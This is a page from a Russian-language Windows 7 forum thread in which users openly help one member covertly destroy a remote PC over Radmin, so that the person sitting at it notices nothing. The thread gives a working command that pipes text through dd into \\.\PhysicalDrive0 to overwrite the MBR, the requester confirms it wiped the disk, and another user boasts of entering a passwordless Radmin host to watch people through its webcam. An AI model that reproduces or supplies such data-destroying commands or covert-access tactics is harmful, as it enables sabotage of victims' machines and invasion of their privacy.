|
На страницу « 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175 » |
|
|
|
|
Возраст: 41 C нами с 20.09.2004 Репутация: 176.4
|
|
Этот топик для обсуждения работы Windows 7, использования различных программ и драйверов под ней, вопросы об особенностях работы и т. д.
Все поиски и обсуждения различных дистрибутивов, взлома активации и прочие варезные вопросы в топике Windows 7: дистрибутивы, поиск, взлом.
Если Вам, по каким-то причинам, не нравится эта операционная система, не стоит писать об этом в данной теме. Создайте отдельную, но предельно чётко и подробно аргументируйте свою позицию.
Возможно обновление уже установленной Windows Vista x64 -> Windows 7 x64
и Windows Vista x86 -> Windows 7 x86 с последующей переактивацией.
Выпуск обновлений прекратится 14.01.2020
https://support.microsoft.com/ru-ru/help/4057281/windows-7-support-will-end-on-january-14-2020
BypassESU — продолжаем получать обновления до 10 января 2023.
https://gitlab.com/stdout12/adns/uploads/b5ad06702413b6bf6b1d5a1db8b086d4/BypassESU-v11.7z (password 2020)
Набор обновлений UpdatePack7R2 для Windows 7 SP1 и Server 2008 R2 SP1
https://blog.simplix.info/update7/
Мини FAQ:
* Чтобы добавить свою информацию в шапку, просто нажмите "Сообщить модератору" над этим сообщением.
|
Последний раз редактировалось: baldahin (13 Янв 2009, 21:28), всего редактировалось 1 раз
|
|
|
|
|
|
|
Возраст: 47 C нами с 17.10.2005 Репутация: 347.3
|
|
Имеется машина, под управлением Window_7, на которой установлена программа для удаленного управления компьютером (Radmin) с юзером на право полного доступа к компьютеру. В системе стоит Касперский_6.0 (корпоративная версия). Виндовый фаервол работает и блочит все входящие соединения, открыт только один единственный порт, для Radmin.
Задача:
1) оригинальным методом убить установленную на компе Win_7
2) пользователь сидящий за компом в этот момент, не должен видеть действий злоумыщленника.
3) чем больше разрушений будит нанесено системному разделу, тем лучше.
4) цель (в идеале) - убить винду системными средствами, без привлечения вирусных программ. После перезагрузки компьютера пользователь видит черный экран и на системном разделе нет ни одного файла.
5) удаление данных на других разделах жесткого диска, кроме системного - не представляют интереса.
Вроде казалось бы куда проще задача, если есть установленный Radmin с полными правами, НО простыми системными средствами типа по telnet через Radmin (format C:\) или (del C:\windows) сделать ничего не получится, винда тупо не дает отпились сук, на котором сидит юзер. Внедрение autoexec.bat и т.д. легко обнаруживается Каспером, который его блочит (в момент загрузки винды), а работающий фаервол не дает приконектится удаленно к системному реестру, чтобы "почистить" ветки
Принимаются любые предложения, которые буду проверять, по мере возможности, на виртуалке и отписываться в данной теме.
|
Последний раз редактировалось: PIRAT (11 Янв 2011, 2:23), всего редактировалось 1 раз
_____________________________ ♫-♠♥♣♦-♫
|
|
|
|
|
|
|
Возраст: 36 C нами с 14.05.2005 Репутация: 127.5
|
|
А прописать батник с format c: в шелдуере?
|
_____________________________ Est Sularus oth Mitas.
|
|
|
|
|
|
|
Возраст: 47 C нами с 17.10.2005 Репутация: 347.3
|
|
aleksss писал(а): |
А прописать батник с format c: в шелдуере?
|
это было бы слишком просто
1) винда не дает форматнуть системный раздел, системными средствами.
2) батник при загрузке убивает Каспер и не дает ему сработать.
|
_____________________________ ♫-♠♥♣♦-♫
|
|
|
|
|
|
|
Возраст: 36 C нами с 14.05.2005 Репутация: 127.5
|
|
В смысле "при загрузке"?
Для шелдуера перезагружать комп не надо - ставим время и наслаждаемся
Ну можно не форматировать - ветки реестра постирать и т.п.
С другой стороны: Что мешает при наличии полного доступа отключить касперского, например?
|
_____________________________ Est Sularus oth Mitas.
|
|
|
|
|
|
|
Возраст: 47 C нами с 17.10.2005 Репутация: 347.3
|
|
aleksss писал(а): |
В смысле "при загрузке"?
Для шелдуера перезагружать комп не надо - ставим время и наслаждаемся
Ну можно не форматировать - ветки реестра постирать и т.п.
С другой стороны: Что мешает при наличии полного доступа отключить касперского, например?
|
format С: и т.д. это стандартная системная команда, винда не дает форматнуть системный диск. Бантник не может сработать, его блокирует каспер т.к. в батнике прописаны команды на формат или на правку реестра. При полном доступе через радмин, пользователь сидящий за компом не должен ничего заподозрить, поэтому отключение Каспера через Radmin или ручная правка реестра не прокатит.
|
_____________________________ ♫-♠♥♣♦-♫
|
|
|
|
|
|
|
Возраст: 42 C нами с 22.02.2007 Репутация: 33.7
|
|
а через telnet удолить попробуй реест или че нить из винды что отвечает за её работоспособность
|
|
|
|
|
|
|
|
C нами с 02.09.2010 Репутация: 65.3
|
|
Скачиваешь вот это записываешь на хард в раздел автозагрузки, ребутишь комп и вуаля Сносил win Vista парню, антивирусы даже не успевают сработать. Не смотри, что старый - работает кул.
|
|
|
|
|
|
|
|
Возраст: 44 C нами с 05.04.2005 Репутация: 121.1
|
|
PIRAT, в винде есть остатки от POSIX и доступ к диску можно получить через «магическое» имя файла типа \\?\PhysicalDrive0 если записать в этот файл 512 байт командой типа: echo killhim > \\?\PhysicalDrive0 — таблица разделов диска будет уничтожена — пустой чёрный экран после перезагрузки с сообщением «Отсутствует загрузуочный диск, вставьте диск и нажмите кнопку». У группы «Администраторы» по идеи должны быть права доступа на запись к файлу диска (можно убедиться с помощью программы http://technet.microsoft.com/ru-ru/sysinternals/bb896657 ), только тут есть несколько проблем
— в win7 с включённым UAC насколько я понял — права администратора даются только по запросу
— файлы из пространства имён \\? не совсем стандартны и стандартные утилиты системы не умеют работать с ними:
C:\Windows\system32>echo killhim > \\?\PhysicalDrive0
Параметр задан неверно. |
Добавлено спустя 39 минут:
можно скачать dd для win32 например вот отсюда http://www.securitylab.ru/blog/personal/humiliating/8031.php (это стандартная утилита копирования POSIX, не троян и не вирус)
и стереть MBR например такой командой:
echo killhim | dd of=\\.\PhysicalDrive0 bs=512 count=1
|
_____________________________ IRC WeNet #programming
jid: seb2000@jabber.ru
|
|
|
|
|
|
|
Возраст: 32 C нами с 25.02.2007 Репутация: 288.4
|
|
а что каспер все батники блокирует? Ведь можно было бы при пользователе запустить такой для правки реестра, в момент когда юзверя нет.
|
|
|
|
|
|
|
|
C нами с 04.10.2009 Репутация: 62.1
|
|
Всех с прошедшими,
Ситуйня: на компе 64 разрядная Винда 7. На нем расшареный принтер (МФУ HP 3015, семеркой поддерживается, дрова и для 32 и для 64 разрядной на оф. сайте есть) который отлично работает (с 64 битными дровами естессно) на самом Вин7 компе.
При попытке подключиться к принтеру с ноута с ХР, ХР просит "дрова для принтера на сервере". В частности inf файл.
Скачивал с оф сайта 32 разрядные дрова, выкорчевывал из exe архива все *.inf - ноут с XP ничего не жрет, говорит некорректный драйвер. А на 64 разрядную вин7 - 32 битные дрова не встают.
На семерке в свойствах принтера нашел возможность установить дополнительно дрова для х86, обрадовался думал щас. Но стерьва требует опять же некий inf, а то что дают (выкорчеванное из 32 разрядного дистрибутива дров с оф сайта) не жрет, кричит "не то". Что ей ещё надо?!
Когда на компе была такая же XP - всё работало как часы. И комп и ноут в одной домашней сети, через роутер.
Что делать?
|
_____________________________ "Барон Мюнхаузен славен не тем что он летал на Луну. Он славен тем, что никогда не врет."
|
|
|
|
|
|
|
Возраст: 47 C нами с 17.10.2005 Репутация: 347.3
|
|
ВОЛЬТ писал(а): |
а через telnet удолить попробуй реест или че нить из винды что отвечает за её работоспособность
|
жизненно важные файлы, отвечающие за работоспособность винды и жинненно для нее важные, не получится переименовать или удалить по telnet системными средствами. Срабатывает системная защита, она тупо не дает этого сделать. Не так все просто. Казалось бы удали или переименуй папку Windows или System32, но не тут то было. Я тоже так думал, пока не задался этой задачей.
Flakes писал(а): |
а что каспер все батники блокирует? Ведь можно было бы при пользователе запустить такой для правки реестра, в момент когда юзверя нет.
|
да, почти все блокирует, особенно где есть команды на формат или удаление файлов или самораспаковывающиеся архивы с ключами на правку реестра, блочит и удаляет беспощадно, еще и орет при этом, юзер настораживается, начинает нервничать, может отключить Радмин (что не приемлемо).
Запусть что-либо когда юзера нет за компом ? А как ты узнаешь сидит он за компом в этот момент или нет ? Может он никаких действий не производит на компе, а например сидит за ним обедает и тупо смотрит в экран (юзеры разные бывают) вариант тоже неприемлем, движений мышкой через Радмин или движения окон он не должен видеть и вообще не должен ни о чем догадываться.
|
_____________________________ ♫-♠♥♣♦-♫
|
|
|
|
|
|
|
Возраст: 47 C нами с 17.10.2005 Репутация: 347.3
|
|
Munchhausen писал(а): |
Скачивал с оф сайта 32 разрядные дрова, выкорчевывал из exe архива все *.inf - ноут с XP ничего не жрет, говорит некорректный драйвер. А на 64 разрядную вин7 - 32 битные дрова не встают.
|
а зачем что-либо выкарчевывать ??? Ты на ноут с ХР пытался поставить драйвер для 32-ух разрядной Win_7 ???
Скачивай драйвер для ХР (32-ух разрядной) и устанавливай его на ноут, после этого подсключайся к расшаренному принтеру (с Win_7_х64). Или такой вариант не прокатывает ???
Если драйвер на ХР не получится поставить отдельно, без подключенного принтера, тогда в момент подключения принтера по сети выбери ручную установку драйвера для него и установи драйвер на ноуте для Win_XP_x32. Все должно работать.
|
_____________________________ ♫-♠♥♣♦-♫
|
|
|
|
|
|
|
Возраст: 47 C нами с 17.10.2005 Репутация: 347.3
|
|
seb спасибо, работает Что и как я сделал:
1) качнул архив с dd.exe по ссылке выше.
2) через радмин создал на удаленном компьютере папку c:\dd в которую закинул файл dd.exe
3) далее по telnet через радмина
echo killhim | c:\dd\dd of=\\.\PhysicalDrive0 bs=512 count=1 |
после перезагрузки удаленного компа:
после данных манипуляций, в конечном итоге, жесткий диск представляет собой кусок неразмеченного адресного пространства, на котором нет никаких данных:
вирусов в dd.exe нет:
это идеальный результат ! на который я даже и не надеялся.
|
Последний раз редактировалось: PIRAT (11 Янв 2011, 21:13), всего редактировалось 3 раз(а)
_____________________________ ♫-♠♥♣♦-♫
|
|
|
|
|
|
|
C нами с 26.06.2009 Репутация: 50.9
|
|
Раз тут сидят такие спецы - такая история : хотела сделать как лучше, а не получилось :
( 2 ноутбука (один на лицензионном касперском, второй на AVG) просканировала бесплатном сканером
a-squared, все нормуль, все путем, но там где AVG 2 дня не работал
нашел 3 трояна и фигню собирающую статистику,
на том где был касперский лицензионный 60 с х. троянов. 10 еще
каких-то, ии фигню статистичискую. На третьем компе с лицензионным касперским порядка 90 троянов, 17 незнаю каких
и х. всякой. После этого на последнем компе 71 ошибка возникает
на 5 шаге сканирования и приехали
Мастер сказал. что надо подкачать системные файлы, которые удалил антивирусник вместе с вирусом и проверить антивирусом.
Вопрос- на х. проверять антивирусником еще раз, когда
уже и так все проверено.
Вообщем кому надо убить винду - зовите, у меня талант прям открылся
|
|
|
|
|
|
|
|
C нами с 12.03.2008 Репутация: 74.3
|
|
PIRAT, это я когда узнал про радмин начел искатьу кого открыт порт...ну не обэтом ну так вот у одного ноута был открыт порт + без пароля и когда приконектился он был в бездействии что-бы не спалится я посидел подумал и все же решился полазить и нашел что там есть Web -камера зайдя в нее было весело наблюдать как ходят люди в кокойто квартире ))))Вывод:если у человека ноут то можно такими образом наблюдать есть кто-нить рядом))))
|
|
|
|
|
|
|
|
На страницу « 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175 »
|
|